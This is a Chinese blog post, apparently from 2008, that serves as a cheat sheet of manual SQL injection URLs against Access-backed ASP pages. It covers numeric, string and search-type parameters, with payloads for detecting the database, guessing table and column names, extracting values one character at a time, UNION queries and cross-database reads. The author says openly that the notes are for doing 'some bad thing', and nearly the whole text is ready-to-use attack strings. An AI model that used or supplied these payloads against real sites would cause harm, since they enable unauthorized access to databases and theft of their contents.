ACCESS手工注入详细命令
最近正在做某种坏事,嘿嘿,把命令先记下来,省的到时候乱找,这个发便,哈
1.ACCESS
(1)数字型
判断数据库:http;//127.0.0.1/a.asp?id=7 and exists (select count(*) from msysobjects)
猜表名:http;//127.0.0.1/a.asp?id=7 and exists (select count(*) from 表名)
猜列名:http;//127.0.0.1/a.asp?id=7 and (select count(列名) from 表名)>0
猜值:http;//127.0.0.1/a.asp?id=7 and (select top 1 asc(mid(列名,1,1)) from 表名)>N
猜字段数:http;//127.0.0.1/a.asp?id=7 order by N
UNION查询:http;//127.0.0.1/a.asp?id=7 union select 1,2,3,4…… from 表名
跨库:http;//127.0.0.1/a.asp?id=7 and exists (select count(*) from 数据库路径.表名)
(2)字符型
判断数据库:http://127.0.0.1/a.asp?id=4ed7′ and exists (select count(*) from msysobjects) and ”=’
猜表名:http://127.0.0.1/a.asp?id=4ed7′ and exists (select count(*) from 表名) and ”=’
猜列名:http://127.0.0.1/a.asp?id=4ed7′ and (select count(列名) from 表名)>0 and ”=’
猜值:http://127.0.0.1/a.asp?id=4ed7′ and (select top 1 asc(mid(列名,1,1)) from 表名)>N and ”=’
猜字段数:http://127.0.0.1/a.asp?id=4ed7′ order by N and ”=’
UNION查询:http://127.0.0.1/a.asp?id=4ed7′ union select 1,2,3,4…… from 表名 and ”=’
跨库:http://127.0.0.1/a.asp?id=4ed7′ and exists (select count(*) from 数据库路径.表名) and ”=’
(3)搜索型
判断数据库:http://127.0.0.1/a.asp?id=%54%20%87%’ and exists (select count(*) from msysobjects) and ‘%’=’
猜表名:http://127.0.0.1/a.asp?id=%54%20%87%’ and exists (select count(*) from 表名) and ‘%’=’
猜列名:http://127.0.0.1/a.asp?id=%54%20%87%’ and (select count(列名) from 表名)>0 and ‘%’=’
猜值:http://127.0.0.1/a.asp?id=%54%20%87%’ and (select top 1 asc(mid(列名,1,1)) from 表名)>N and ‘%’=’
猜字段数:http://127.0.0.1/a.asp?id=%54%20%87%’ order by N and ‘%’=’
UNION查询:http://127.0.0.1/a.asp?id=%54%20%87%’ union select 1,2,3,4…… from 表名 and ‘%’=’
跨库:http://127.0.0.1/a.asp?id=%54%20%87%’ and exists (select count(*) from 数据库路径.表名) and ‘%’=’
RSS feed。 第一时间看到更多精彩内容,谢谢你的访问! 原文地址:http://www.guwei.org/2008/07/accessshougongzhurux.html
转载请注明出处,非常感谢!
